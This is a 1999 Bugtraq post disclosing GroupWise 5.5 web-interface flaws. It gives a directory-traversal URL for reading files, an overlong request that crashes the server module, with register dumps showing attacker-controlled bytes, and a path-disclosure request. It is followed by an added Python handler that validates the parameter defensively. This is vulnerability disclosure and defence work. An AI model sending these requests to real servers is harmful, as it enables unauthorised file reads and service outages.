Bugtraq mailing list archives

Re: Groupwise Web Interface


From: afrith () IBL BM (Andrew Frith)
Date: Wed, 22 Dec 1999 22:23:16 -0400


Setup:
NT 4, SP4, IIS 4
Netware 4.11, SP7a, GW 5.5 SP2 - Internet Agent & Web access NLM

1.  Web server path
http://server/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
returns:
Could not find file C:\<web server
root>\cgi-bin\GW5\US\HTML3\HELP\BAD-REQUEST.HTM

2.  Read files
Using the format
http://server/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index I can read any
files that the web service account has read access to & that end in .htm or
.html on the drive, not just in the web areas.

3.  DOS?
Sending http://server/cgi-bin/GW5/GWWEB.EXE?<tested with minimum of 512
characters> will cause an abend in GWINTER.NLM (See Break 1 below).  The
server appears to function normally.  Trying to shut things down
however......  Upon shutting down the Internet agent we then get another
abend, again in GWINTER.NLM (See Break 2 below).  The Internet agent will
shut down.  The web access will hang, until the server is downed.  The NT
box is unaffected by this.

In the first abend GWINTER blows up.  Also on the stack is GWENN2.NLM.  Not
much there.

In the second abend GWINTER goes boom again.  Also on the stack is
GWCMC.NLM.  What is a bit more interesting is that EBX = 61616161, or aaaa,
what I was using on the command line.  This string is also in the stack
several times.

I have been able to reproduce the above consistently.

***********

Break 1: Server-4.11a: Page Fault Processor Exception (Error code 00000000)

Registers:
    CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010
    EAX = 72006165 EBX = E022BDA8 ECX = 00000004 EDX = 00000001
    ESI = E022BDA4 EDI = E022A01C EBP = 00000002 ESP = 0A082F70
    EIP = F1B6DD5D FLAGS = 00017297
    F1B6DD5D 8A00           MOV     AL,[EAX]= ?
    EIP in GWINTER.NLM at code start +00000D5Dh

Running process: gwinter         5 Process
Created by: GWINTER.NLM
Stack pointer: A082D60
Stack limit: A063010
Scheduling priority: 0
Wait state: 00
Stack: --0000000A  ?
       --E022C0D3  ?
       --E022BED2  ?
       --00000004  ?
       --0000024C  ?
       --E022BECA  ?
       --E022BD78  ?
       --E022BD84  ?
       --0A120131  ?
       --000001F4  ?
       --0A082FE8  ?
       --00000000  ?
       --E022A02C  ?
       --E022A01C  ?
       F1B6D53F  (GWINTER.NLM|(Code Start)+53F)
       --E022A01C  ?
       --E022A01C  ?
       --E0228540  ?
       F1B81EF9  ?
       --E022A01C  ?
       F148F0AD  (GWENN2.NLM|GW2_NgwThrdCreate+1EE)
       --E0228540  ?
       --00000000  ?
       --E022A01C  ?
       --00000000  ?
       --FB0513E0  ?
       --E020E7B0  ?
       --0A0F6A60  ?
       --FB0513E0  ?
       --0A125010  ?
       --0A083008  ?
       F10BC181  (THREADS.NLM|ScheduleWorkToDo+180)

Additional Information:
    The CPU encountered a problem executing code in GWINTER.NLM.  The
    problem may be in that module or in data passed to that module
    by another NLM.

**********

Break 2: Server-4.11a: Page Fault Processor Exception (Error code 00000000)

Registers:
    CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010
    EAX = 00000000 EBX = 61616161 ECX = 00000000 EDX = E0B9B4E0
    ESI = 00000001 EDI = 00000096 EBP = 0A123C6C ESP = 0A123C68
    EIP = F80BC070 FLAGS = 00017202
    F80BC070 8B73FC         MOV     ESI,[EBX-04]= ?
    EIP in SERVER.NLM at code start +000BC070h

Running process: gwinter         0 Process
Created by: GWINTER.NLM
Stack pointer: A123C60
Stack limit: A104010
Scheduling priority: 0
Wait state: 00
Stack: --00000000  ?
       --0A123C84  ?
       --00000096  ?
       --00000001  ?
       --61616161  ?
       F10B45ED  (THREADS.NLM|free+63)
       --61616161  ?
       --0A123C94  ?
       --E022A01C  ?
       F1B38537  (GWCMC.NLM|cmc_free+11)
       --61616161  ?
       --0A123FD8  ?
       F1B82341  ?
       --61616161  ?
       --00000008  ?
       --00000000  ?
       --0A125350  ?
       --0000890B  (DS.NLM|DSF9085F20+55D8)
       F1B83C52  ?
       --0BB01F80  (FPSM.NLM|_fltused_+B01A)
       --00007286  (DS.NLM|DSF9085F20+3F53)
       --F915D970  ?
       --F915DAA0  ?
       --00000000  ?
       --0A123CF8  ?
       --0A123CF0  ?
       --0A0F6460  ?
       --00000001  ?
       --00000004  ?
       F80BC193  ?
       --00000004  ?
       --002E12E0  ?

Additional Information:
    The CPU encountered a problem executing code in SERVER.NLM.  The
    problem may be in that module or in data passed to that module
    by a process owned by GWINTER.NLM.

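Added example, not part of Andrew Frith's post or of the GroupWise code: a hardened handler for the HELP= parameter that shows the two checks whose absence the report describes, path containment under the help directory (item 2) and a length cap on the input (item 3). The help directory, the 64-byte cap and the function names are assumptions for illustration.

```python
import ntpath
import re
from typing import Optional
from urllib.parse import unquote

# Assumed values (not from the post): the help directory as printed in the
# report's error message, and a cap well under the 512 bytes at which the
# report observed the GWINTER.NLM abend.
HELP_ROOT = r"C:\Inetpub\wwwroot\cgi-bin\GW5\US\HTML3\HELP"
MAX_HELP_LEN = 64
TOPIC_RE = re.compile(r"[A-Za-z0-9_-]+")   # bare topic names only


def resolve_help_topic(help_value: str) -> Optional[str]:
    """Map a HELP= value to a file under HELP_ROOT, or None if rejected.

    Check 1 (allow-list): the topic must be a bare name, so '..', '/', '\\'
    and drive letters never reach the path logic.  Check 2 (containment,
    defence in depth): after canonicalisation the path must still lie
    inside HELP_ROOT.  The extension is fixed server-side, so only .HTM
    files can ever be served.
    """
    value = unquote(help_value)            # undo %2e%2e%2f style encoding
    if len(value) > MAX_HELP_LEN or not TOPIC_RE.fullmatch(value):
        return None
    target = ntpath.normpath(ntpath.join(HELP_ROOT, value.upper() + ".HTM"))
    root = ntpath.normpath(HELP_ROOT).lower() + "\\"   # NTFS is case-insensitive
    if not target.lower().startswith(root):
        return None
    return target


def classify_help_request(help_value: str) -> str:
    """Label a HELP= value the way a log reviewer would:
    'ok', 'too-long' (the overlong input tied to the crash),
    'traversal' (path escape attempt) or 'rejected' (other bad input)."""
    value = unquote(help_value)
    if len(value) > MAX_HELP_LEN:
        return "too-long"
    if ".." in value or "/" in value or "\\" in value or ":" in value:
        return "traversal"
    return "ok" if resolve_help_topic(value) else "rejected"
```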
